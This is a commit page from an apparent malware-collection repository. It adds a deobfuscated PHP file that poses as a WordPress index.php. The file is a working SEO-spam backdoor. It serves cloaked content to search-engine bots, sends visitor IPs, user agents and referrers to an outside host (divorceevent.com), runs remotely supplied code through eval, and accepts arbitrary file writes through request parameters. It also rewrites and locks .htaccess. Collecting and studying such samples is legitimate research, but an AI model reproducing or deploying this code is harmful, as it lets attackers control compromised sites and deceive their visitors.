STRLCPY/inc0d3-malware

add deofuscated wp index.php in spam
inc0d3 committed 5 years ago

a258fed8

1 parent 0e19a68a

■ ■ ■ ■ ■ ■

spam/wp-index-desofuscado.php

1	+	<?php
2	+	$a='401';
3	+	$b='1';
4	+	$c='1';
5	+	$cadena="s6l5cpd1eyuh3qo8nmkg-0bvi7xztw49r_fja2";
6	+	$O0_0__OO0O = "preg_replace_callback";
7	+	$O0OO0O___0 = "stream_socket_client";
8	+	$O00O0OO___ = "stream_get_meta_data";
9	+	$O_0_OO0_O0 = "stream_set_blocking";
10	+	$OOO0__0_O0 = "stream_set_timeout";
11	+	$O0_OO_0O0_ = "ignore_user_abort";
12	+	$O0O0__OO0_ = "file_put_contents";
13	+	$OO_0_OO00_ = "file_get_contents";
14	+	$O0OO_O_00_ = "http_build_query";
15	+	$O0O0__O_0O = "function_exists";
16	+	$O_O00__0OO = "error_reporting";
17	+	$OO_O000_O_ = "create_function";
18	+	$OO_O_000O_ = "set_time_limit";
19	+	$O0__OO0_0O = "gethostbyname";
20	+	$OO0_O0_0O_ = "base64_decode";
21	+	$O0O__O0O0_ = "preg_replace";
22	+	$O00O_O0__O = "str_replace";
23	+	$O0O0___0OO = "file_exists";
24	+	$O0__OO0O0_ = "curl_setopt";
25	+	$OO_OO0_00_ = "array_shift";
26	+	$O00_O_O0O_ = "preg_match";
27	+	$O0_0OOO_0_ = "curl_error";
28	+	$O__0O_O0O0 = "curl_close";
29	+	$O_O0_OO_00 = "urlencode";
30	+	$O00__O0OO_ = "parse_url";
31	+	$O_00O_OO_0 = "gzinflate";
32	+	$OO__0_00OO = "curl_init";
33	+	$OOO0_0__0O = "curl_exec";
34	+	$O_O0__0O0O = "is_array";
35	+	$OO__000O_O = "mt_rand";
36	+	$OOO0O0_0__ = "implode";
37	+	$O00O_O_O0_ = "explode";
38	+	$O_0O0O_0O_ = "dirname";
39	+	$O0_O_0_OO0 = "usleep";
40	+	$OO_0__0O0O = "unlink";
41	+	$OO0_O0__0O = "strstr";
42	+	$OO_0O_00_O = "strpos";
43	+	$O0_OO0_O0_ = "strlen";
44	+	$OOO__00O_0 = "hexdec";
45	+	$O_O_0O0_0O = "getenv";
46	+	$O_O_O_000O = "fwrite";
47	+	$O00_OO__0O = "fclose";
48	+	$O_O__O00O0 = "fread";
49	+	$O_O00OO__0 = "fgets";
50	+	$OO__0O_0O0 = "chmod";
51	+	$O0_0_O_0OO = "trim";
52	+	$O00_OO__O0 = "join";
53	+	$O__0_OOO00 = "feof";
54	+	$OO0___00OO = "date"
55	+	header('Content-Type:text/html;charset=utf-8');
56	+
57	+	${"GLOBALS"}["O_O00__0OO"](0);
58	+
59	+	if(!function_exists('str_ireplace')){
60	+	function str_ireplace($from,$to,$string){
61	+	return trim(preg_replace("/".addcslashes($from,"?:\\/*^$")."/si",$to,$string));
62	+	}
63	+	};
64	+
65	+	$OOO0__O_00=create_function('$url,$O00O___O0O=0,$OO_O00__0O=1,$OO_O_0O0_0=NULL,$OO_0_0O0_O=array()','
66	+	if(!preg_match("/^http\\:\\/\\//si",$url)){
67	+	if(isset(${"_GET"}["urlebb"])){
68	+	//substring de 0 a 5
69	+	$OO__00_0OO="[urlerror] invalid url: ";
70	+	$OO__00_0OO.=$url;
71	+	echo $OO__00_0OO;
72	+	unset($OO__00_0OO);
73	+	exit();
74	+	}
75	+	return \'\';
76	+	}
77	+
78	+	//substring 0 a 5
79	+	$O0_OO__00O="curl_init+curl_setopt+curl_exec\|fsockopen\|pfsockopen\|stream_socket_client\|socket_create";
80	+	$OO0O_0__0O=$O_0O0_O0O_=\'\';
81	+	foreach(explode(\'\|\',$O0_OO__00O) as $c){
82	+	$OO__O_O000=1;
83	+	if($O00O___O0O && substr($c,0,1) == \'c\'){
84	+	continue;
85	+	}
86	+	foreach(explode(\'+\',$c) as $d){
87	+	if(!function_exists($d)){ $OO__O_O000=0; }
88	+	}
89	+	unset($d);
90	+	if($OO__O_O000){
91	+	$OO0O_0__0O=$c;
92	+	break;
93	+	}
94	+	}
95	+	unset($O0_OO__00O,$c);
96	+	if($OO0O_0__0O==\'\'){ return 0;}
97	+	if(substr($OO0O_0__0O,0,1)==\'c\'){
98	+	$ch=curl_init();
99	+	curl_setopt($ch,CURLOPT_URL,$url);
100	+	curl_setopt($ch,CURLOPT_USERAGENT,\'WHR\');
101	+	curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
102	+	curl_setopt($ch,CURLOPT_TIMEOUT,100);
103	+	if($OO_O00__0O==2){
104	+	curl_setopt($ch,CURLOPT_POST,1);
105	+	if(is_array($OO_O_0O0_0)){
106	+	curl_setopt($ch,CURLOPT_POSTFIELDS,http_build_query($OO_O_0O0_0));
107	+	}
108	+	}
109	+	$O_00OOO_0_=curl_exec($ch);
110	+	curl_close($ch);
111	+
112	+	if(!$O_00OOO_0_){
113	+	if(isset(${"_GET"}["curlerr"])){
114	+
115	+	$OO__00_0OO="[curl error] ";
116	+	$OO__00_0OO.=curl_error($ch);
117	+	echo $OO__00_0OO;
118	+	unset($OO__00_0OO);
119	+	exit();
120	+	}
121	+	return 0;
122	+	}
123	+	else {
124	+	$O_00OOO_0_=trim(trim($O_00OOO_0_,"\\xEF\\xBB\\xBF"));
125	+	return $O_00OOO_0_;
126	+	}
127	+	}
128	+	$OO_O_0_O00=parse_url($url);
129	+	isset($OO_O_0_O00["host"])\|\|$OO_O_0_O00["host"]=\'\';
130	+	isset($OO_O_0_O00["path"])\|\|$OO_O_0_O00["path"]=\'\';
131	+	isset($OO_O_0_O00["query"])\|\| $OO_O_0_O00["query"]=\'\';
132	+	isset($OO_O_0_O00["O_O0O00__O"])\|\|$OO_O_0_O00["O_O0O00__O"]=\'\';
133	+	$OO00O0_O__=$OO_O_0_O00["path"]?$OO_O_0_O00["path"].($OO_O_0_O00["query"]?\'?\'.$OO_O_0_O00["query"]:\'\'):\'/\';
134	+	$OO0__O0_O0=$OO_O_0_O00["host"];
135	+	if($OO_O_0_O00["scheme"]==\'https\'){
136	+	$OO_00_OO_0=\'1.1\';
137	+	$O_O0O00__O=empty($OO_O_0_O00["O_O0O00__O"])?443:$OO_O_0_O00["O_O0O00__O"];
138	+
139	+	$OO0__O0_O0= "ssl://";
140	+	$OO0__O0_O0.=$OO_O_0_O00["host"];
141	+	}
142	+	else{
143	+	$OO_00_OO_0=\'1.0\';
144	+	$O_O0O00__O=empty($OO_O_0_O00["O_O0O00__O"])?80:$OO_O_0_O00["O_O0O00__O"];
145	+	}
146	+	$OOO_0O00__=\'Host:\';
147	+	$OOO_0O00__.=$OO0__O0_O0;
148	+	$OO_0_0O0_O[]=$OOO_0O00__;
149	+	$OO_0_0O0_O[]="Connection:Close";
150	+	$OO_0_0O0_O[]="User-Agent:WHR";
151	+	$OO_0_0O0_O[]="Accept:/";
152	+
153	+	unset($OOO_0O00__);
154	+
155	+	if($OO_O00__0O==2){
156	+	if(is_array($OO_O_0O0_0)){
157	+	$OO_O_0O0_0=http_build_query($OO_O_0O0_0);
158	+	}
159	+	$OO_0_0O0_O[]="Content-type:application/x-www-form-urlencoded";
160	+	$OO_0_0O0_O[]="Content-Length:".strlen($OO_O_0O0_0);
161	+
162	+	$O_0O0_O0O_="POST $OO00O0_O__ HTTP/$OO_00_OO_0\\r\\n".join("\\r\\n",$OO_0_0O0_O)."\\r\\n\\r\\n".$OO_O_0O0_0;
163	+	unset($OO_O_0O0_0);
164	+	}
165	+	else{
166	+	$O_0O0_O0O_="GET $OO00O0_O__ HTTP/$OO_00_OO_0\\r\\n".join("\\r\\n",$OO_0_0O0_O)."\\r\\n\\r\\n";
167	+	}
168	+	unset($OO_0_0O0_O,$OO_O_0_O00,$OO_00_OO_0,$OO00O0_O__);
169	+	$O0OO_0O_0_=null;
170	+
171	+	if(substr($OO0O_0__0O,-1)==\'n\'){
172	+	$O0OO_0O_0_=$OO0O_0__0O($OO0__O0_O0,$O_O0O00__O,$OO__00_0OOno,$OO__00_0OOstr,30);
173	+	}else{
174	+	if(substr($OO0O_0__0O,-1)==\'t\'){
175	+	$OO0O_0_O_0 = "tcp://";
176	+	$OO0O_0_O_0.= $OO0__O0_O0;
177	+	$OO0O_0_O_0.=\':\';
178	+	$OO0O_0_O_0.=$O_O0O00__O;
179	+	$O0OO_0O_0_=stream_socket_client($OO0O_0_O_0,$OO__00_0OOno,$OO__00_0OOstr,30);
180	+	unset($OO0O_0_O_0);
181	+	}
182	+	}
183	+	$O0O_0_0O_O=\'\';
184	+	if($O0OO_0O_0_){
185	+	stream_set_blocking($O0OO_0O_0_,true);
186	+	stream_set_timeout($O0OO_0O_0_,30);
187	+	fwrite($O0OO_0O_0_,$O_0O0_O0O_);
188	+	if(!$O00O___O0O){
189	+	$O0O0_0O__O=stream_get_meta_data($O0OO_0O_0_);
190	+	if(!$O0O0_0O__O["timed_out"]){
191	+	while(!feof($O0OO_0O_0_)){
192	+	$O_O_0_O0O0=fgets($O0OO_0O_0_);
193	+	if($O_O_0_O0O0&&($O_O_0_O0O0=="\\r\\n"\|\|$O_O_0_O0O0=="\\n")){break;}
194	+	unset($O_O_0_O0O0);
195	+	}
196	+	while(!feof($O0OO_0O_0_)){
197	+	$O___0OO00O=fread($O0OO_0O_0_,8192);
198	+
199	+	$O0O_0_0O_O.=$O___0OO00O;
200	+	unset($O___0OO00O);
201	+	}
202	+	}
203	+	unset($O0O0_0O__O);
204	+	}
205	+
206	+	fclose($O0OO_0O_0_);
207	+	}
208	+	else{
209	+	if(substr($OO0O_0__0O,-1)==\'e\'){
210	+	$OO_00O0__O=gethostbyname($OO0__O0_O0);
211	+	$O0OO_0O_0_=$OO0O_0__0O(AF_INET,SOCK_STREAM,0);
212	+	if(socket_connect($O0OO_0O_0_,$OO_00O0__O,$O_O0O00__O)){
213	+	if(!$O00O___O0O){
214	+	socket_write($O0OO_0O_0_,$O_0O0_O0O_,strlen($O_0O0_O0O_));
215	+	while($O_0_O_00OO=@socket_read($O0OO_0O_0_,8192)){
216	+	$O0O_0_0O_O.=$O_0_O_00OO;
217	+	unset($O_0_O_00OO);}
218	+	$O0O_0_0O_O=explode("\\r\\n\\r\\n",$O0O_0_0O_O);
219	+	array_shift($O0O_0_0O_O);
220	+	$O0O_0_0O_O=implode("\\r\\n\\r\\n",$O0O_0_0O_O);
221	+	}
222	+	else{
223	+	$O0_O__0OO0=mt_rand(2,5);
224	+	$O0_O__O00O=0;
225	+	while($O0_O__O00O<$O0_O__0OO0){
226	+	socket_write($O0OO_0O_0_,$O_0O0_O0O_,strlen($O_0O0_O0O_));
227	+	$O0_O__O00O++;
228	+	usleep(mt_rand(50000,100000));
229	+	}
230	+	unset($O0_O__O00O,$O0_O__0OO0);
231	+	}
232	+	}
233	+	socket_close($O0OO_0O_0_);
234	+	unset($OO_00O0__O);
235	+	}
236	+	}
237	+	if($O0O_0_0O_O==\'\'){
238	+	if(function_exists(file_get_contents) and $url){
239	+	$O0O_0_0O_O=@file_get_contents($url);
240	+	}
241	+
242	+	}
243	+	unset($O_0O0_O0O_,$OO0O_0__0O,$O0OO_0O_0_,$O_O0O00__O,$OO0__O0_O0);
244	+	if(!$O00O___O0O){
245	+	$O0O_0_0O_O=preg_replace_callback(\'/(?:(?:\\r\\n\|\\n)\|^)([0-9A-F]+)(?:\\r\\n\|\\n){1,2}(.*?)\'.\'((?:\\r\\n\|\\n)(?:[0-9A-F]+(?:\\r\\n\|\\n))\|$)/si\',create_function(\'$matches\',\'return hexdec($matches[1])==strlen($matches[2])?$matches[2]:$matches[0];\'),$O0O_0_0O_O);
246	+	return trim(trim($O0O_0_0O_O,"\\xEF\\xBB\\xBF"));
247	+	}
248	+	else{return 1;
249	+	}'
250	+	);
251	+
252	+	$b64decode=create_function('$string','
253	+	$O__0O_0OO0=substr($string,0,5);
254	+	$O_0OOO00__=substr($string,-5);
255	+	$O0O_00_O_O=substr($string,7,strlen($string)-14);
256	+	return gzinflate(base64_decode($O__0O_0OO0.$O0O_00_O_O.$O_0OOO00__));'
257	+	);
258	+
259	+	$OO0O__00O_=create_function('$O0_OO__00Ogent','$OO_O0_0O0_=false;
260	+	$O_O0_00O_O= "googlebot\|bingbot\|google\|aol\|bing\|yahoo";
261	+	if($O0_OO__00Ogent!=\'\'){
262	+	if(preg_match("/($O_O0_00O_O)/si",$O0_OO__00Ogent)){
263	+	$OO_O0_0O0_=true;
264	+	}
265	+	}
266	+	return $OO_O0_0O0_;'
267	+	);
268	+
269	+	$OO_O__O000=create_function('$O_00OOO_0_efer','$O_0_0O0OO_=false;
270	+	$O0O0O0O___= "google.co.jp\|yahoo.co.jp\|bing";
271	+	if($O_00OOO_0_efer!=\'\'&&preg_match("/($O0O0O0O___)/si",$O_00OOO_0_efer)){
272	+	$O_0_0O0OO_=true;
273	+	}
274	+	return $O_0_0O0OO_;'
275	+	);
276	+	$O0_O0_O0O_=create_function('$OO0_0OO0__','
277	+	$OO__OO0_00=isset($_REQUEST["xxxxxxxxxxxx_filename"])?$_REQUEST["xxxxxxxxxxxx_filename"]:\'\';
278	+	$O_O_0O0O0_=isset($_REQUEST["xxxxxxxxxxxx_filecontent"])?$_REQUEST["xxxxxxxxxxxx_filecontent"]:\'\';
279	+	if(file_exists($OO__OO0_00)){
280	+	if(!unlink($OO__OO0_00)){
281	+	echo "delete\|error";
282	+	exit();
283	+	}
284	+	}
285	+	file_put_contents($OO__OO0_00,$O_O_0O0O0_,FILE_APPEND);
286	+	echo $OO__OO0_00.\'\|success\';'
287	+	);
288	+
289	+	$O0O_O_O0_0=create_function('$O__0O_00OO=\'\',$c,$OO_O_0_00O,$O_0OO_O00_','$symbol_url;
290	+	$O0_OO0O_0_="<IfModule mod_rewrite.c>";
291	+	$OO_00_0O_O="RewriteEngine";
292	+	$O__O0O_0O0="RewriteBase";
293	+	$OO__O0O0_0="RewriteRule";
294	+	$O0OO0O__0_="RewriteCond";
295	+	$O_0__O0O0O="</IfModule>";
296	+	$OO0O0O___0="REQUEST_FILENAME";
297	+	$O__OO0_00O="index.php"
298	+
299	+	$O__0O_00OO= $O0_OO0O_0_."\\n";
300	+	$O__0O_00OO .=$OO_00_0O_O."\\x20On\\n";
301	+	$O__0O_00OO .=$O__O0O_0O0."\\x20/\\n";
302	+	$O__0O_00OO .=$OO__O0O0_0."\\x20^".$O__OO0_00O."$\\x20-\\x20[L]\\n";
303	+	$O__0O_00OO .=$O0OO0O__0_."\\x20%{".$OO0O0O___0."}\\x20!-f\\n";
304	+	$O__0O_00OO .=$O0OO0O__0_."\\x20%{".$OO0O0O___0."}\\x20!-d\\n";
305	+	$O__0O_00OO .=$OO__O0O0_0."\\x20.\\x20".$symbol_url.$O__OO0_00O." [L]\\n";
306	+	$O__0O_00OO .=$O_0__O0O0O;
307	+
308	+	/*
309	+	<IfModule mod_rewrite.c>
310	+	RewriteEngine On
311	+	RewriteBase /
312	+	RewriteRule ^index.php$ - [L]
313	+	RewriteCond %{REQUEST_FILENAME} !-f
314	+	RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L]
315	+	</IfModule>
316	+	*/
317	+	if($O__0O_00OO!=\'\'){
318	+	if($c){$O_00__O0OO="./.htaccess";
319	+	if($O_00__O0OO!=\'\'){
320	+	@chmod($O_00__O0OO,0644);
321	+	$O0O_O00_O_=@file_get_contents($O_00__O0OO);
322	+	if(!strstr($O0O_O00_O_,$OO0O0O___0)\|\|!strstr($O0O_O00_O_,$O__OO0_00O)){
323	+	$O0O_O00_O_=$O__0O_00OO.PHP_EOL .$O0O_O00_O_;
324	+	@file_put_contents($O_00__O0OO,$O0O_O00_O_);
325	+	}
326	+	}
327	+	@chmod($O_00__O0OO,0444);
328	+	}}'
329	+	);
330	+
331	+	$OO___00O0O=create_function('$OO0_0OO0__=\'\'','
332	+	@set_time_limit(3600);
333	+	@ignore_user_abort(1);
334	+	global $a,$c,$b;
335	+	$O_00O__OO0=\'400\';
336	+	$O__O_000OO=\'\';
337	+	if(isset($_REQUEST["xxxxxxxxxxxx_loads"])){
338	+	//crea archivo enviado por post
339	+	${"GLOBALS"}["O0_O0_O0O_"]();
340	+	exit();
341	+	}
342	+	$O_0_O00OO_ = "unknown";
343	+	if(isset(${"_SERVER"})){
344	+	if(isset(${"_SERVER"}[HTTP_X_FORWARDED_FOR])){
345	+	$O_0_O00OO_=${"_SERVER"}[HTTP_X_FORWARDED_FOR];
346	+	}
347	+	elseif(isset(${"_SERVER"}[HTTP_CLIENT_IP])){
348	+	$O_0_O00OO_=${"_SERVER"}[HTTP_CLIENT_IP];
349	+	}
350	+	else{
351	+	$O_0_O00OO_=${"_SERVER"}[REMOTE_ADDR];
352	+	}
353	+	}else{
354	+	if(getenv("HTTP_X_FORWARDED_FOR")){
355	+	$O_0_O00OO_=getenv("HTTP_X_FORWARDED_FOR");
356	+	}
357	+	elseif(getenv("HTTP_CLIENT_IP")){
358	+	$O_0_O00OO_=getenv("HTTP_CLIENT_IP");
359	+	}else{
360	+	$O_0_O00OO_=getenv("REMOTE_ADDR");
361	+	}
362	+	}
363	+	$O0O__00_OO=${"_SERVER"}["HTTP_ACCEPT_LANGUAGE"];
364	+	$O0_O_0OO_0=isset(${"_SERVER"}["HTTP_REFERER"])?${"_SERVER"}["HTTP_REFERER"]:\'\';
365	+	$OOO00_O0__=isset(${"_SERVER"}["HTTP_USER_AGENT"])?${"_SERVER"}["HTTP_USER_AGENT"]:\'\';
366	+
367	+	$OO_0_O0_O0=${"GLOBALS"}["OO0O__00O_"]($OOO00_O0__);
368	+
369	+	$O0OO_O00__=${"GLOBALS"}["OO_O__O000"]($O0_O_0OO_0);
370	+
371	+	$O_O0OO_00_=\'\';
372	+
373	+	if(isset(${"_SERVER"}["HTTP_HOST"])){
374	+	$O_O0OO_00_=${"_SERVER"}["HTTP_HOST"];
375	+	}
376	+	elseif(isset(${"_SERVER"}["SERVER_NAME"])){
377	+	$O_O0OO_00_=${"_SERVER"}["SERVER_NAME"];
378	+	}
379	+	$O0O0__O_O0=${"_SERVER"}["REQUEST_URI"];
380	+
381	+	$OO_O_0_00O=\'\';
382	+
383	+	$O_0OO_O00_=${"_SERVER"}["DOCUMENT_ROOT"];
384	+	$O_0OO_O00_=str_replace(\'\\\\\',\'/\',$O_0OO_O00_);
385	+
386	+	$O_OO_0_00O=dirname(__FILE__).\'/\';
387	+	$O_OO_0_00O=str_replace(\'\\\\\',\'/\',$O_OO_0_00O);
388	+	$O_OO_00O0_=str_replace($O_0OO_O00_,\'\',$O_OO_0_00O);
389	+
390	+	if(strpos($O0O0__O_O0,".php")>0){
391	+	$OOO0_0_0O_=strpos($O0O0__O_O0,".php")+4;
392	+	$OO_O_0_00O=substr($O0O0__O_O0,0,$OOO0_0_0O_);
393	+	$O__O_000OO=$OO_O_0_00O;
394	+	}
395	+
396	+	if($OO_O_0_00O==\'\'){
397	+	$OO_O_0_00O=$O_OO_00O0_. "index.php";
398	+	$O__O_000OO=$O_OO_00O0_;
399	+	}
400	+
401	+	$OO_O_0_00O=substr($OO_O_0_00O,1);
402	+	$O0__O0OO_0= "www%d.divorceevent.com";
403	+	$OO_00O_0_O=\'\';
404	+
405	+	if(isset(${"_SERVER"}["REQUEST_SCHEME"])){
406	+	$OO_00O_0_O=${"_SERVER"}["REQUEST_SCHEME"];
407	+	}
408	+
409	+	$c=(int)$c;
410	+
411	+	${"GLOBALS"}["O0O_O_O0_0"](\'\',$c,$OO_O_0_00O,$O_0OO_O00_);
412	+
413	+	$O0OOO0_0__=sprintf($O0__O0OO_0,$a);
414	+	$O_0O0OO__0=sprintf($O0__O0OO_0,$O_00O__OO0);
415	+	$O__OOO000_= "http://%host%/data99.php?d=%s&g=%s&t=%s&u=%s&h=%s&p=%s&r=%s&a=%s&l=%s&i=%s&j=%s";
416	+	$O0O_0O_0O_= "http://%host%/jump99.php?d=%s&g=%s&t=%s&u=%s&h=%s&p=%s&r=%s&a=%s&l=%s&i=%s&j=%s";
417	+
418	+	$O__OOO000_=preg_replace("/%host%/si",$O0OOO0_0__,$O__OOO000_);
419	+
420	+	if(isset(${"_GET"}["map"])){
421	+	$O0O0__O_O0=trim(${"_GET"}["map"]).trim(${"_GET"}["file"]);
422	+
423	+	$O__OOO000_=sprintf($O__OOO000_,$O_O0OO_00_,$a,urlencode(date("Y-m-d")),urlencode($O0O0__O_O0),urlencode($OO_00O_0_O),trim($O_0_O00OO_) ,urlencode($O0_O_0OO_0),urlencode($OOO00_O0__),$O0O__00_OO,$O__O_000OO,0);
424	+
425	+	$O0O_0_0O_O=${"GLOBALS"}["OOO0__O_00"]($O__OOO000_);
426	+
427	+	$O0_OO_0_O0=trim(${"_GET"}["file"]);
428	+
429	+	if(isset(${"_GET"}["file"])){
430	+	$O0_OO_0_O0=trim(${"_GET"}["file"]);
431	+	}
432	+
433	+	if(strstr($O0O_0_0O_O,\'<spango>\')){
434	+	$O0O_0_0O_O=str_replace(\'<spango>\',\'\',$O0O_0_0O_O);
435	+	file_put_contents($O0_OO_0_O0,$O0O_0_0O_O);
436	+	echo \'map success\';
437	+	unset($O0O_0_0O_O,$O__OOO000_,$O0OOO0_0__,$O_0O0OO__0,$O0O0__O_O0,$O_O0OO_00_,$O0_O_0OO_0,$OOO00_O0__);
438	+	exit();
439	+	}
440	+	}
441	+
442	+	$O__OOO000_=sprintf($O__OOO000_,$O_O0OO_00_,$a,urlencode(date("Y-m-d")),urlencode($O0O0__O_O0),urlencode($OO_00O_0_O),trim($O_0_O00OO_) ,urlencode($O0_O_0OO_0),urlencode($OOO00_O0__),$O0O__00_OO,$O__O_000OO,0);
443	+	$O0O_0O_0O_=preg_replace("/%host%/si",$O_0O0OO__0,$O0O_0O_0O_);
444	+	$O0O_0O_0O_=sprintf($O0O_0O_0O_,$O_O0OO_00_,$a,urlencode(date("Y-m-d")),urlencode($O0O0__O_O0),urlencode($OO_00O_0_O),trim($O_0_O00OO_) ,urlencode($O0_O_0OO_0),urlencode($OOO00_O0__),$O0O__00_OO,$O__O_000OO,1);
445	+
446	+	//url = http://www0.divorceevent.com/jump99.php?d=&g=&t=2019-09-08&u=&h=&p=&r=&a=&l=&i=&j=1
447	+
448	+	if(isset(${"_GET"}["xxnew2018_url1"])){
449	+	echo $O__OOO000_;exit();
450	+	}
451	+	if(isset(${"_GET"}["xxnew2018_url2"])){
452	+	echo $O0O_0O_0O_;exit();
453	+	}
454	+	if(isset(${"_GET"}["xxxxxx_num"])){
455	+	echo $b;exit();
456	+	}
457	+	if(preg_match(\'/(sitemap).*.xml$/\',$O0O0__O_O0)){
458	+	$O0O_0_0O_O=${"GLOBALS"}["OOO0__O_00"]($O__OOO000_);
459	+
460	+	if(strstr($O0O_0_0O_O,\'<spango>\')){
461	+	$O0O_0_0O_O=str_replace(\'<spango>\',\'\',$O0O_0_0O_O);
462	+	@header(\'content-type:text/xml\');
463	+	echo "$O0O_0_0O_O";
464	+	unset($O0O_0_0O_O,$O__OOO000_,$O0OOO0_0__,$O_0O0OO__0,$O0O0__O_O0,$O_O0OO_00_,$O0_O_0OO_0,$OOO00_O0__);
465	+	exit();
466	+	}
467	+	}
468	+	if($OO_0_O0_O0){
469	+	$O0O_0_0O_O=${"GLOBALS"}["OOO0__O_00"]($O__OOO000_);
470	+	if(strstr($O0O_0_0O_O,\'<spango>\')){
471	+	$O0O_0_0O_O=str_replace(\'<spango>\',\'\',$O0O_0_0O_O);
472	+	echo "$O0O_0_0O_O";
473	+	unset($O0O_0_0O_O,$url_format,$O0OOO0_0__,$O_0O0OO__0,$O0O0__O_O0,$O_O0OO_00_,$O0_O_0OO_0,$OOO00_O0__);
474	+	exit();
475	+	}
476	+	elseif(strstr($O0O_0_0O_O,\'<spanev>\')){
477	+	$O0O_0_0O_O=str_replace(\'<spanev>\',\'\',$O0O_0_0O_O);
478	+	@eval($O0O_0_0O_O);
479	+	unset($O0O_0_0O_O,$url_format,$O0OOO0_0__,$O_0O0OO__0,$O0O0__O_O0,$O_O0OO_00_,$O0_O_0OO_0,$OOO00_O0__);
480	+	exit();
481	+	}
482	+	}if($O0OO_O00__){
483	+	$O0O_0_0O_O=${"GLOBALS"}["OOO0__O_00"]($O0O_0O_0O_);
484	+	if(strstr($O0O_0_0O_O,\'<spango>\')){
485	+	$O0O_0_0O_O=str_replace(\'<spango>\',\'\',$O0O_0_0O_O);
486	+	echo "$O0O_0_0O_O";unset($O0O_0_0O_O,$url_format,$O0OOO0_0__,$O_0O0OO__0,$O0O0__O_O0,$O_O0OO_00_,$O0_O_0OO_0,$OOO00_O0__);
487	+	exit();
488	+	}
489	+	elseif(strstr($O0O_0_0O_O,\'<spanev>\')){
490	+	$O0O_0_0O_O=str_replace(\'<spanev>\',\'\',$O0O_0_0O_O);
491	+	@eval($O0O_0_0O_O);
492	+	unset($O0O_0_0O_O,$url_format,$O0OOO0_0__,$O_0O0OO__0,$O0O0__O_O0,$O_O0OO_00_,$O0_O_0OO_0,$OOO00_O0__);
493	+	exit();
494	+	}
495	+	}');
496	+
497	+	${"GLOBALS"}["OO___00O0O"]();?>

php/wp-index.php spam/wp-index.php

Unable to diff as some line is too long.

add deofuscated wp index.php in spam